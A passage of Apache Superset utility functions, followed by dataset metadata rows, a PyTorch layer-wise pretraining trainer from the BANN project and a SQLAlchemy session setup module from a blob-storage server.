applied_time_extras[filter_column] = time_extra_value
elif filtr["val"]:
# Merge column filters
filter_key = get_filter_key(filtr)
if filter_key in existing_filters:
# Check if the filter already exists
if isinstance(filtr["val"], list):
if isinstance(existing_filters[filter_key], list):
# Add filters for unequal lists
# order doesn't matter
if set(existing_filters[filter_key]) != set(filtr["val"]):
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
# Do not add filter if same value already exists
if filtr["val"] != existing_filters[filter_key]:
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
# Filter not found, add it
adhoc_filters.append(simple_filter_to_adhoc(filtr))
# Remove extra filters from the form data since no longer needed
del form_data["extra_filters"]
def merge_request_params(form_data: Dict[str, Any], params: Dict[str, Any]) -> None:
"""
Merge request parameters to the key `url_params` in form_data. Only updates
or appends parameters to `form_data` that are defined in `params; pre-existing
parameters not defined in params are left unchanged.
:param form_data: object to be updated
:param params: request parameters received via query string
"""
url_params = form_data.get("url_params", {})
for key, value in params.items():
if key in ("form_data", "r"):
continue
url_params[key] = value
form_data["url_params"] = url_params
def user_label(user: User) -> Optional[str]:
"""Given a user ORM FAB object, returns a label"""
if user:
if user.first_name and user.last_name:
return user.first_name + " " + user.last_name
return user.username
return None
def get_or_create_db(
database_name: str, sqlalchemy_uri: str, always_create: Optional[bool] = True
) -> "Database":
# pylint: disable=import-outside-toplevel
from superset import db
from superset.models import core as models
database = (
db.session.query(models.Database).filter_by(database_name=database_name).first()
)
# databases with a fixed UUID
uuids = {
"examples": EXAMPLES_DB_UUID,
}
if not database and always_create:
logger.info("Creating database reference for %s", database_name)
database = models.Database(
database_name=database_name, uuid=uuids.get(database_name)
)
db.session.add(database)
if database:
database.set_sqlalchemy_uri(sqlalchemy_uri)
db.session.commit()
return database
def get_example_database() -> "Database":
db_uri = (
current_app.config.get("SQLALCHEMY_EXAMPLES_URI")
or current_app.config["SQLALCHEMY_DATABASE_URI"]
)
return get_or_create_db("examples", db_uri)
def get_main_database() -> "Database":
db_uri = current_app.config["SQLALCHEMY_DATABASE_URI"]
return get_or_create_db("main", db_uri)
def backend() -> str:
return get_example_database().backend
def is_adhoc_metric(metric: Metric) -> TypeGuard[AdhocMetric]:
return isinstance(metric, dict) and "expressionType" in metric
def get_metric_name(metric: Metric) -> str:
"""
Extract label from metric
:param metric: object to extract label from
:return: String representation of metric
:raises ValueError: if metric object is invalid
"""
if is_adhoc_metric(metric):
label = metric.get("label")
if label:
return label
expression_type = metric.get("expressionType")
if expression_type == "SQL":
sql_expression = metric.get("sqlExpression")
if sql_expression:
return sql_expression
elif expression_type == "SIMPLE":
column: AdhocMetricColumn = metric.get("column") or {}
column_name = column.get("column_name")
aggregate = metric.get("aggregate")
if column and aggregate:
return f"{aggregate}({column_name})"
if column_name:
return column_name
raise ValueError(__("Invalid metric object"))
return metric # type: ignore
def get_metric_names(metrics: Sequence[Metric]) -> List[str]:
return [metric for metric in map(get_metric_name, metrics) if metric]
def get_first_metric_name(metrics: Sequence[Metric]) -> Optional[str]:
metric_labels = get_metric_names(metrics)
return metric_labels[0] if metric_labels else None
def ensure_path_exists(path: str) -> None:
try:
os.makedirs(path)
except OSError as ex:
if not (os.path.isdir(path) and ex.errno == errno.EEXIST):
raise
def convert_legacy_filters_into_adhoc( # pylint: disable=invalid-name
form_data: FormData,
) -> None:
mapping = {"having": "having_filters", "where": "filters"}
if not form_data.get("adhoc_filters"):
adhoc_filters: List[AdhocFilterClause] = []
form_data["adhoc_filters"] = adhoc_filters
for clause, filters in mapping.items():
if clause in form_data and form_data[clause] != "":
adhoc_filters.append(form_data_to_adhoc(form_data, clause))
if filters in form_data:
for filt in filter(lambda x: x is not None, form_data[filters]):
adhoc_filters.append(simple_filter_to_adhoc(filt, clause))
for key in ("filters", "having", "having_filters", "where"):
if key in form_data:
del form_data[key]
def split_adhoc_filters_into_base_filters( # pylint: disable=invalid-name
form_data: FormData,
) -> None:
"""
Mutates form data to restructure the adhoc filters in the form of the four base
filters, `where`, `having`, `filters`, and `having_filters` which represent
free form where sql, free form having sql, structured where clauses and structured
having clauses.
"""
adhoc_filters = form_data.get("adhoc_filters")
if isinstance(adhoc_filters, list):
simple_where_filters = []
simple_having_filters = []
sql_where_filters = []
sql_having_filters = []
for adhoc_filter in adhoc_filters:
expression_type = adhoc_filter.get("expressionType")
clause = adhoc_filter.get("clause")
if expression_type == "SIMPLE":
if clause == "WHERE":
simple_where_filters.append(
{
"col": adhoc_filter.get("subject"),
"op": adhoc_filter.get("operator"),
"val": adhoc_filter.get("comparator"),
}
)
elif clause == "HAVING":
simple_having_filters.append(
{
"col": adhoc_filter.get("subject"),
"op": adhoc_filter.get("operator"),
"val": adhoc_filter.get("comparator"),
}
)
elif expression_type == "SQL":
if clause == "WHERE":
sql_where_filters.append(adhoc_filter.get("sqlExpression"))
elif clause == "HAVING":
sql_having_filters.append(adhoc_filter.get("sqlExpression"))
form_data["where"] = " AND ".join(
["({})".format(sql) for sql in sql_where_filters]
)
form_data["having"] = " AND ".join(
["({})".format(sql) for sql in sql_having_filters]
)
form_data["having_filters"] = simple_having_filters
form_data["filters"] = simple_where_filters
def get_username() -> Optional[str]:
"""Get username if within the flask context, otherwise return noffin'"""
try:
return g.user.username
except Exception: # pylint: disable=broad-except
return None
def parse_ssl_cert(certificate: str) -> _Certificate:
"""
Parses the contents of a certificate and returns a valid certificate object
if valid.
:param certificate: Contents of certificate file
:return: Valid certificate instance
:raises CertificateException: If certificate is not valid/unparseable
"""
try:
return x509.load_pem_x509_certificate(
certificate.encode("utf-8"), default_backend()
)
except ValueError as ex:
raise CertificateException("Invalid certificate") from ex
def create_ssl_cert_file(certificate: str) -> str:
"""
This creates a certificate file that can be used to validate HTTPS
sessions. A certificate is only written to disk once; on subsequent calls,
only the path of the existing certificate is returned.
:param certificate: The contents of the certificate
:return: The path to the certificate file
:raises CertificateException: If certificate is not valid/unparseable
"""
filename = f"{md5_sha_from_str(certificate)}.crt"
cert_dir = current_app.config["SSL_CERT_PATH"]
path = cert_dir if cert_dir else tempfile.gettempdir()
path = os.path.join(path, filename)
if not os.path.exists(path):
# Validate certificate prior to persisting to temporary directory
parse_ssl_cert(certificate)
with open(path, "w") as cert_file:
cert_file.write(certificate)
return path
def time_function(
func: Callable[..., FlaskResponse], *args: Any, **kwargs: Any
) -> Tuple[float, Any]:
"""
Measures the amount of time a function takes to execute in ms
:param func: The function execution time to measure
:param args: args to be passed to the function
:param kwargs: kwargs to be passed to the function
:return: A tuple with the duration and response from the function
"""
start = default_timer()
response = func(*args, **kwargs)
stop = default_timer()
return (stop - start) * 1000.0, response
def MediumText() -> Variant: # pylint:disable=invalid-name
return Text().with_variant(MEDIUMTEXT(), "mysql")
def shortid() -> str:
return "{}".format(uuid.uuid4())[-12:]
class DatasourceName(NamedTuple):
table: str
schema: str
def get_stacktrace() -> Optional[str]:
if current_app.config["SHOW_STACKTRACE"]:
return traceback.format_exc()
return None
def split(
string: str, delimiter: str = " ", quote: str = '"', escaped_quote: str = r"\""
) -> Iterator[str]:
"""
A split function that is aware of quotes and parentheses.
:param string: string to split
:param delimiter: string defining where to split, usually a comma or space
:param quote: string, either a single or a double quote
:param escaped_quote: string representing an escaped quote
:return: list of strings
"""
parens = 0
quotes = False
i = 0
for j, character in enumerate(string):
complete = parens == 0 and not quotes
if complete and character == delimiter:
yield string[i:j]
i = j + len(delimiter)
elif character == "(":
parens += 1
elif character == ")":
parens -= 1
elif character == quote:
if quotes and string[j - len(escaped_quote) + 1 : j + 1] != escaped_quote:
quotes = False
elif not quotes:
quotes = True
yield string[i:]
def get_iterable(x: Any) -> List[Any]:
"""
Get an iterable (list) representation of the object.
:param x: The object
:returns: An iterable representation
"""
return x if isinstance(x, list) else [x]
def get_form_data_token(form_data: Dict[str, Any]) -> str:
"""
Return the token contained within form data or generate a new one.
:param form_data: chart form data
:return: original token if predefined, otherwise new uuid4 based token
"""
return form_data.get("token") or "token_" + uuid.uuid4().hex[:8]
def get_column_name_from_metric(metric: Metric) -> Optional[str]:
"""
Extract the column that a metric is referencing. If the metric isn't
a simple metric, always returns `None`.
:param metric: Ad-hoc metric
:return: column name if simple metric, otherwise None
"""
if is_adhoc_metric(metric):
metric = cast(AdhocMetric, metric)
if metric["expressionType"] == AdhocMetricExpressionType.SIMPLE:
return cast(Dict[str, Any], metric["column"])["column_name"]
return None
def get_column_names_from_metrics(metrics: List[Metric]) -> List[str]:
"""
Extract the columns that a list of metrics are referencing. Expcludes all
SQL metrics.
:param metrics: Ad-hoc metric
:return: column name if simple metric, otherwise None
"""
return [col for col in map(get_column_name_from_metric, metrics) if col]
def extract_dataframe_dtypes(df: pd.DataFrame) -> List[GenericDataType]:
"""Serialize pandas/numpy dtypes to generic types"""
# omitting string types as those will be the default type
inferred_type_map: Dict[str, GenericDataType] = {
"floating": GenericDataType.NUMERIC,
"integer": GenericDataType.NUMERIC,
"mixed-integer-float": GenericDataType.NUMERIC,
"decimal": GenericDataType.NUMERIC,
"boolean": GenericDataType.BOOLEAN,
"datetime64": GenericDataType.TEMPORAL,
"datetime": GenericDataType.TEMPORAL,
"date": GenericDataType.TEMPORAL,
}
generic_types: List[GenericDataType] = []
for column in df.columns:
series = df[column]
inferred_type = infer_dtype(series)
generic_type = inferred_type_map.get(inferred_type, GenericDataType.STRING)
generic_types.append(generic_type)
return generic_types
def extract_column_dtype(col: "BaseColumn") -> GenericDataType:
if col.is_temporal:
return GenericDataType.TEMPORAL
if col.is_numeric:
return GenericDataType.NUMERIC
# TODO: add check for boolean data type when proper support is added
return GenericDataType.STRING
def indexed(
items: List[Any], key: Union[str, Callable[[Any], Any]]
) -> Dict[Any, List[Any]]:
"""Build an index for a list of objects"""
idx: Dict[Any, Any] = {}
for item in items:
key_ = getattr(item, key) if isinstance(key, str) else key(item)
idx.setdefault(key_, []).append(item)
return idx
def is_test() -> bool:
return strtobool(os.environ.get("SUPERSET_TESTENV", "false"))
def get_time_filter_status(
datasource: "BaseDatasource", applied_time_extras: Dict[str, str],
) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
temporal_columns = {col.column_name for col in datasource.columns if col.is_dttm}
applied: List[Dict[str, str]] = []
rejected: List[Dict[str, str]] = []
time_column = applied_time_extras.get(ExtraFiltersTimeColumnType.TIME_COL)
if time_column:
if time_column in temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_COL})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.COL_NOT_IN_DATASOURCE,
"column": ExtraFiltersTimeColumnType.TIME_COL,
}
)
if ExtraFiltersTimeColumnType.TIME_GRAIN in applied_time_extras:
# are there any temporal columns to assign the time grain to?
if temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_GRAIN})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NO_TEMPORAL_COLUMN,
"column": ExtraFiltersTimeColumnType.TIME_GRAIN,
}
)
time_range = applied_time_extras.get(ExtraFiltersTimeColumnType.TIME_RANGE)
if time_range:
# are there any temporal columns to assign the time grain to?
if temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_RANGE})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NO_TEMPORAL_COLUMN,
"column": ExtraFiltersTimeColumnType.TIME_RANGE,
}
)
if ExtraFiltersTimeColumnType.TIME_ORIGIN in applied_time_extras:
if datasource.type == "druid":
applied.append({"column": ExtraFiltersTimeColumnType.TIME_ORIGIN})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NOT_DRUID_DATASOURCE,
"column": ExtraFiltersTimeColumnType.TIME_ORIGIN,
}
)
if ExtraFiltersTimeColumnType.GRANULARITY in applied_time_extras:
if datasource.type == "druid":
applied.append({"column": ExtraFiltersTimeColumnType.GRANULARITY})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NOT_DRUID_DATASOURCE,
"column": ExtraFiltersTimeColumnType.GRANULARITY,
}
)
return applied, rejected
def format_list(items: Sequence[str], sep: str = ", ", quote: str = '"') -> str:
quote_escaped = "\\" + quote
return sep.join(f"{quote}{x.replace(quote, quote_escaped)}{quote}" for x in items)
def find_duplicates(items: Iterable[InputType]) -> List[InputType]:
"""Find duplicate items in an iterable."""
return [item for item, count in collections.Counter(items).items() if count > 1]
def remove_duplicates(
items: Iterable[InputType], key: Optional[Callable[[InputType], Any]] = None
) -> List[InputType]:
"""Remove duplicate items in an iterable."""
if not key:
return list(dict.fromkeys(items).keys())
seen = set()
result = []
for item in items:
item_key = key(item)
if item_key not in seen:
seen.add(item_key)
result.append(item)
return result
def normalize_dttm_col(
df: pd.DataFrame,
timestamp_format: Optional[str],
offset: int,
time_shift: Optional[timedelta],
) -> None:
if DTTM_ALIAS not in df.columns:
return
if timestamp_format in ("epoch_s", "epoch_ms"):
dttm_col = df[DTTM_ALIAS]
if is_numeric_dtype(dttm_col):
# Column is formatted as a numeric value
unit = timestamp_format.replace("epoch_", "")
df[DTTM_ALIAS] = pd.to_datetime(
dttm_col, utc=False, unit=unit, origin="unix"
)
else:
# Column has already been formatted as a timestamp.
df[DTTM_ALIAS] = dttm_col.apply(pd.Timestamp)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format
)
if offset:
df[DTTM_ALIAS] += timedelta(hours=offset)
if time_shift is not None:
df[DTTM_ALIAS] += time_shift
def parse_boolean_string(bool_str: Optional[str]) -> bool:
"""
Convert a string representation of a true/false value into a boolean
>>> parse_boolean_string(None)
False
>>> parse_boolean_string('false')
False
>>> parse_boolean_string('true')
True
>>> parse_boolean_string('False')
False
>>> parse_boolean_string('True')
True
>>> parse_boolean_string('foo')
False
>>> parse_boolean_string('0')
False
>>> parse_boolean_string('1')
True
:param bool_str: string representation of a value that is assumed to be boolean
:return: parsed boolean value
"""
if bool_str is None:
return False
try:
return bool(strtobool(bool_str.lower()))
except ValueError:
return False
def apply_max_row_limit(limit: int, max_limit: Optional[int] = None,) -> int:
"""
Override row limit if max global limit is defined
:param limit: requested row limit
:param max_limit: Maximum allowed row limit
:return: Capped row limit
>>> apply_max_row_limit(100000, 10)
10
>>> apply_max_row_limit(10, 100000)
10
>>> apply_max_row_limit(0, 10000)
10000
"""
if max_limit is None:
max_limit = current_app.config["SQL_MAX_ROW"]
if limit != 0:
return min(max_limit, limit)
return max_limit
def escape_sqla_query_binds(sql: str) -> str:
"""
Replace strings in a query that SQLAlchemy would otherwise interpret as
bind parameters.
:param sql: unescaped query string
:return: escaped query string
>>> escape_sqla_query_binds("select ':foo'")
"select '\\\\:foo'"
>>> escape_sqla_query_binds("select 'foo'::TIMESTAMP")
"select 'foo'::TIMESTAMP"
>>> escape_sqla_query_binds("select ':foo :bar'::TIMESTAMP")
"select '\\\\:foo \\\\:bar'::TIMESTAMP"
>>> escape_sqla_query_binds("select ':foo :foo :bar'::TIMESTAMP")
"select '\\\\:foo \\\\:foo \\\\:bar'::TIMESTAMP"
"""
matches = BIND_PARAM_REGEX.finditer(sql)
processed_binds = set()
for match in matches:
bind = match.group(0)
if bind not in processed_binds:
sql = sql.replace(bind, bind.replace(":", "\\:"))
processed_binds.add(bind)
return sql
| 31.538546 | 88 | 0.636572 |
007a4dd7c930df4e631e6ced5310c2169b1a75f7
| 16,488 |
py
|
Python
|
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import math
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import Optional, Tuple, Iterable, Callable, Dict, List, Pattern, Union, Final, final
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from bann.b_container.constants.file_names import TrainSubStrSuf
from bann.b_data_functions.pytorch.p_gen_fun import re_copy_model
from bann.b_frameworks.pytorch.interfaces.glw_pretraining_interface import \
GLWPNetInterface
from bann.b_container.functions.dict_str_repr import dict_string_repr
from bann.b_container.states.framework.interface.train_state import TrainState
from bann.b_test_train_prepare.pytorch.trainer_interface import TrainerInterfaceArgs, \
TrainerInterface
from bann.b_container.states.framework.pytorch.p_train.p_train_glw import GLWPTState
from bann.b_test_train_prepare.errors.custom_errors import KnownTrainerError
from bann.b_test_train_prepare.pytorch.p_train.functions.p_train_gen_fun import \
t_print_to_logger, PQueueTupleErg, PTrainEpochFunReturn, \
p_pre_train_epoch_gen, PPreTrainEpochFun, p_train_epoch_fun, SimpleSGDOptim
from bann.b_container.states.framework.pytorch.lr_scheduler_param import LrSchAlgWr
from bann.b_container.states.framework.pytorch.criterion_param import CriterionAlgWr
from bann.b_container.states.framework.pytorch.optim_param import OptimAlgWr
from pan.public.constants.train_net_stats_constants import TrainNNStatsElementType, \
TrainReturnFiller, TrainNNStatsElementFiller, TrainNNStatsElemInfo, \
create_train_net_stats_function
from rewowr.public.functions.syncout_dep_functions import logger_print_to_console
from rewowr.public.functions.worker_ctx import get_worker_ctx
from rewowr.public.interfaces.logger_interface import SyncStdoutInterface
_TRAIN_LOSS_STR: Final[str] = 'Train_Loss'
_EVAL_LOSS_STR: Final[str] = 'Eval_Loss'
_EVAL_TR_V_STR: Final[str] = 'Eval_Truth'
_TRAIN_TR_V_STR: Final[str] = 'Train_Truth'
_STR_LOSS_NUM: Final[Pattern[str]] = re.compile(r'(Eval_Loss|Train_Loss)_(\d+)')
_STR_TR_V_NUM: Final[Pattern[str]] = re.compile(r'(Eval_Truth)_(\d+)')
@final
@dataclass
class _TrainArgsCon:
batch_size: Tuple[int, ...]
shuffle: bool
input_train: Tuple[Dataset, ...]
input_eval: Tuple[Dataset, ...]
cuda: bool
drop_last: bool
num_workers: int
epoch_size: int
report_size: int
model: GLWPNetInterface
device: torch.device
@final
@dataclass
class _TrainWrArgs:
optimizer: Optional[OptimAlgWr]
scheduler: Optional[LrSchAlgWr]
criterion: Optional[CriterionAlgWr]
model: GLWPNetInterface
device: torch.device
truth_fun_id: str
train_ll: Tuple[str, Optional[int]]
test_ll: Tuple[str, Optional[int]]
end_criterion: float
batch_size: Tuple[int, ...]
shuffle: bool
input_train: Tuple[Dataset, ...]
input_eval: Tuple[Dataset, ...]
cuda: bool
drop_last: bool
num_workers: int
epoch_size: int
report_size: int
@final
@dataclass
class _ExtraData:
use_cuda: bool
model: nn.Module
tr_size: int
def _print_to_logger(sync_out: SyncStdoutInterface, trainer_stats: GLWPTState,
args_trainer: TrainerInterfaceArgs, extra_args: _ExtraData, /) -> None:
output_string = f"The arguments given to GLW-Pretrainer:\n"
output_string += f"Training on data with the size {extra_args.tr_size}\n"
output_string += f"The GLW-Pretrainer:"
output_string += f"\n\t{dict_string_repr(trainer_stats.get_kwargs().__dict__)}\n"
output_string += t_print_to_logger(args_trainer, extra_args.use_cuda, extra_args.model)
logger_print_to_console(sync_out, output_string)
_TrsT: Final = Callable[
[Tuple[DataLoader, ...], Tuple[DataLoader, ...], nn.Module, Tuple[int, int, int]],
PTrainEpochFunReturn
]
def _train_stack_fun(epoch_rep_layer: Tuple[int, int, int],
tt_loader: Tuple[Tuple[DataLoader, ...], Tuple[DataLoader, ...]],
stop_at_loss: float, layer_model: nn.Module, train_epoch: _TrsT, /) \
-> Iterable[Tuple[PQueueTupleErg, ...]]:
max_epoch, report_size, layer_cnt = epoch_rep_layer
epoch = 1
running_loss: float = float('inf')
report_cnt = 0
while epoch < max_epoch + 1:
int_max = int(epoch + report_size)
int_max = max_epoch + 1 if int_max > max_epoch + 1 else int_max
erg_loss: List[PTrainEpochFunReturn] = list(
p_pre_train_epoch_gen(tt_loader, (epoch, int_max, layer_cnt), layer_model, train_epoch)
)
if erg_loss and not math.isnan(erg_loss[-1].running_loss):
running_loss = erg_loss[-1].running_loss
last_run = int_max >= max_epoch + 1 or (
0 < running_loss < stop_at_loss and report_cnt >= 2
)
yield (
PQueueTupleErg(
f"{_TRAIN_LOSS_STR}_{layer_cnt}", epoch, [
elem.test_train.test_loss
if not (math.isnan(elem.test_train.test_loss)
or math.isinf(elem.test_train.test_loss))
else -1.0
for elem in erg_loss
], last_run
),
PQueueTupleErg(
f"{_EVAL_LOSS_STR}_{layer_cnt}", epoch, [
elem.test_eval.test_loss
if not (math.isnan(elem.test_eval.test_loss)
or math.isinf(elem.test_eval.test_loss))
else -1.0
for elem in erg_loss
], last_run
),
PQueueTupleErg(
f"{_TRAIN_TR_V_STR}_{layer_cnt}", epoch,
[elem.test_train.truth_v for elem in erg_loss], last_run
),
PQueueTupleErg(
f"{_EVAL_TR_V_STR}_{layer_cnt}", epoch,
[elem.test_eval.truth_v for elem in erg_loss], last_run
)
)
epoch = int_max
if 0 < running_loss < stop_at_loss and report_cnt >= 2:
epoch = max_epoch + 1
report_cnt += 1
def _train_fun(stop_at_loss: float, args_cont: _TrainArgsCon, train_epoch: _TrsT, /) \
-> Iterable[Tuple[PQueueTupleErg, ...]]:
train_loader = tuple(DataLoader(
tr_in[1],
batch_size=args_cont.batch_size[tr_in[0] % len(args_cont.batch_size)],
shuffle=args_cont.shuffle,
pin_memory=args_cont.cuda,
num_workers=args_cont.num_workers,
drop_last=args_cont.drop_last
) for tr_in in enumerate(args_cont.input_train))
test_loader = tuple(DataLoader(
te_in[1],
batch_size=args_cont.batch_size[te_in[0] % len(args_cont.batch_size)],
shuffle=False,
pin_memory=args_cont.cuda,
num_workers=args_cont.num_workers,
drop_last=False
) for te_in in enumerate(args_cont.input_eval))
if args_cont.num_workers > 0:
for train_test in [test_loader, train_loader]:
for tr_te_el in train_test:
tr_te_el.multiprocessing_context = get_worker_ctx()
max_epoch = args_cont.epoch_size if args_cont.epoch_size > 4 else 4
report_size = args_cont.report_size
report_size = int(max_epoch / 2) if report_size >= int(max_epoch / 2) else report_size
layer_model: nn.Module
for layer_cnt, layer_model in enumerate(args_cont.model.get_stack()):
model = layer_model.to(args_cont.device)
yield from _train_stack_fun(
(max_epoch, report_size, layer_cnt), (train_loader, test_loader),
stop_at_loss, model, train_epoch
)
re_copy_model(model.state_dict(), layer_model)
def _train_wrapper(wr_container: _TrainWrArgs, /) -> Iterable[Tuple[PQueueTupleErg, ...]]:
if wr_container.criterion is None:
criterion = nn.CrossEntropyLoss()
else:
criterion = wr_container.criterion.criterion
if wr_container.optimizer is None:
optimizer: Union[OptimAlgWr, SimpleSGDOptim] \
= SimpleSGDOptim(wr_container.model.get_stack_first)
else:
optimizer = wr_container.optimizer
def train_epoch(data_loader_train: Tuple[DataLoader, ...],
data_loader_test: Tuple[DataLoader, ...],
model: nn.Module, epoch_layer_batch: Tuple[int, int, int]) \
-> PTrainEpochFunReturn:
return p_train_epoch_fun(PPreTrainEpochFun(
data_loader_train=data_loader_train, data_loader_test=data_loader_test,
epoch=epoch_layer_batch[0], max_batch_cnt=epoch_layer_batch[2],
model=model, device=wr_container.device,
optimizer=optimizer,
criterion=criterion, scheduler_wrapper=wr_container.scheduler,
truth_fun_id=wr_container.truth_fun_id,
train_ll=wr_container.train_ll,
test_ll=wr_container.test_ll,
complete_model=wr_container.model,
layer_cnt=epoch_layer_batch[1],
shuffle=wr_container.shuffle
))
yield from _train_fun(wr_container.end_criterion, _TrainArgsCon(
batch_size=wr_container.batch_size, shuffle=wr_container.shuffle,
input_train=wr_container.input_train, input_eval=wr_container.input_eval,
cuda=wr_container.cuda, drop_last=wr_container.drop_last,
num_workers=wr_container.num_workers, epoch_size=wr_container.epoch_size,
report_size=wr_container.report_size, device=wr_container.device,
model=wr_container.model
), train_epoch)
@final
class GLWPreTrainer(TrainerInterface):
def __init__(self) -> None:
super().__init__()
self.__fitness: Optional[Tuple[float, float]] = None
self.__train_state: Optional[GLWPTState] = None
self.__log = True
self.__state_dict: Optional[Dict] = None
@property
def tr_state_dict(self) -> Dict:
if self.__state_dict is None:
raise KnownTrainerError("Training was not finished")
return self.__state_dict
def deactivate_log(self) -> None:
self.__log = False
@property
def train_state(self) -> GLWPTState:
if self.__train_state is None or not isinstance(self.__train_state, GLWPTState):
raise KnownTrainerError("Train state was not set properly!")
return self.__train_state
def set_train_state(self, state: TrainState, /) -> None:
if not isinstance(state, GLWPTState):
raise KnownTrainerError(
f"Expected type {GLWPTState.__name__} got {type(state).__name__}"
)
self.__train_state = state
@property
def fitness(self) -> Tuple[float, float]:
if self.__fitness is None:
raise KnownTrainerError("The Trainer was not started!")
return self.__fitness
def _set_fitness(self, eval_loss: float, train_loss: float, eval_truth: float, /) -> None:
eval_truth_local = -1.0
eval_loss_local = float('inf')
if not math.isnan(eval_truth) and 0 <= eval_truth < float('inf'):
eval_truth_local = eval_truth
if not math.isnan(eval_loss) and 0 < eval_loss < float('inf'):
if not math.isnan(train_loss) and 0 < train_loss < float('inf'):
eval_loss_local = eval_loss + abs(eval_loss - train_loss) \
* self.train_state.get_kwargs().over_fit
elif self.train_state.get_kwargs().over_fit == 0:
eval_loss_local = eval_loss
self.__fitness = (eval_loss_local, eval_truth_local)
def train(self, sync_out: SyncStdoutInterface,
args: TrainerInterfaceArgs, /) -> Iterable[TrainNNStatsElementType]:
self.__state_dict = None
if not (args.input_train and args.input_eval):
raise KnownTrainerError("Received empty dataset!")
if self.train_state.get_kwargs().torch_thread:
torch.set_num_threads(self.train_state.get_kwargs().torch_thread)
logger_print_to_console(sync_out, f"Torch threads set to {torch.get_num_threads()}\n")
use_cuda = args.cuda and torch.cuda.is_available()
model = args.module.get_net_com
if not isinstance(model, GLWPNetInterface):
raise KnownTrainerError(
f"Expected {GLWPNetInterface.__name__} got {type(model).__name__}"
)
if self.__log:
_print_to_logger(sync_out, self.train_state, args, _ExtraData(
use_cuda=use_cuda, model=args.module.get_net_com,
tr_size=sum(len(tr_in) for tr_in in args.input_train)
))
net_stats_creator_dict: Dict[str, TrainReturnFiller] = {}
result_buffer = []
eval_truth_loss = [-1.0, -1.0, -1.0]
for tuple_erg in _train_wrapper(
_TrainWrArgs(
optimizer=args.optimizer, scheduler=args.scheduler,
criterion=args.criterion, device=torch.device("cuda" if use_cuda else "cpu"),
truth_fun_id=args.truth_fun_id, train_ll=self.train_state.get_kwargs().train_ll,
test_ll=self.train_state.get_kwargs().eval_ll,
end_criterion=self.train_state.get_kwargs().end_criterion,
batch_size=self.train_state.get_kwargs().batch_size,
shuffle=self.train_state.get_kwargs().shuffle,
input_train=args.input_train, input_eval=args.input_eval, cuda=use_cuda,
drop_last=self.train_state.get_kwargs().drop_last,
num_workers=self.train_state.get_kwargs().num_workers,
epoch_size=self.train_state.get_kwargs().epoch_size,
report_size=self.train_state.get_kwargs().report_size,
model=model
)
):
for res in tuple_erg:
found_str = _STR_LOSS_NUM.search(res.series)
if self.train_state.get_kwargs().plot_data \
or self.train_state.get_kwargs().write_data:
net_stats_creator = net_stats_creator_dict.setdefault(
res.series, create_train_net_stats_function()
)
id_ne_file = deepcopy(args.id_file)
if found_str is None:
id_ne_file.add_modifier(TrainSubStrSuf.TRUTH.value)
result = net_stats_creator(
TrainNNStatsElemInfo(
id_file=id_ne_file, name_series=res.series,
type_series='Loss Leg' if found_str is not None else 'Truth Leg',
name_sub_series='Loss' if found_str is not None else 'Truth',
type_sub_series='Sub',
x_label="epoch",
y_label='Loss' if found_str is not None else 'Truth',
title="GLW-Pretrainer", subtitle=""
),
[x_elem + res.epoch for x_elem in range(len(res.y_cords))],
res.y_cords,
TrainNNStatsElementFiller(
last=res.last, plot_data=self.train_state.get_kwargs().plot_data,
dump=args.dump, write_data=self.train_state.get_kwargs().write_data,
hyper_param=args.hyper_str if found_str is not None else ""
)
)
if res.last:
result_buffer.append(result)
else:
yield result
if found_str is not None and _EVAL_LOSS_STR == found_str.group(1):
eval_truth_loss[1] = res.y_cords[-1]
if found_str is not None and _TRAIN_LOSS_STR == found_str.group(1):
eval_truth_loss[2] = res.y_cords[-1]
found_str = _STR_TR_V_NUM.search(res.series)
if found_str is not None and _EVAL_TR_V_STR == found_str.group(1):
eval_truth_loss[0] = res.y_cords[-1]
self._set_fitness(eval_truth_loss[1], eval_truth_loss[2], eval_truth_loss[0])
if not isinstance(model, nn.Module):
raise KnownTrainerError(
f"Expected {nn.Module.__name__} got {type(model).__name__}"
)
self.__state_dict = deepcopy(model.state_dict())
yield from result_buffer
| 44.203753 | 100 | 0.643741 |
b2ff5961db747304633158435de402e9a5df46ec
| 638 |
py
|
Python
|
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session
from src.config import DATABASE_USER, DATABASE_PASSWORD, DATABASE_HOST, DATABASE_PORT, DATABASE_NAME
SQLALCHEMY_DATABASE_URL = (
f"postgresql://{DATABASE_USER}:{DATABASE_PASSWORD}@{DATABASE_HOST}:{DATABASE_PORT}/{DATABASE_NAME}"
)
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
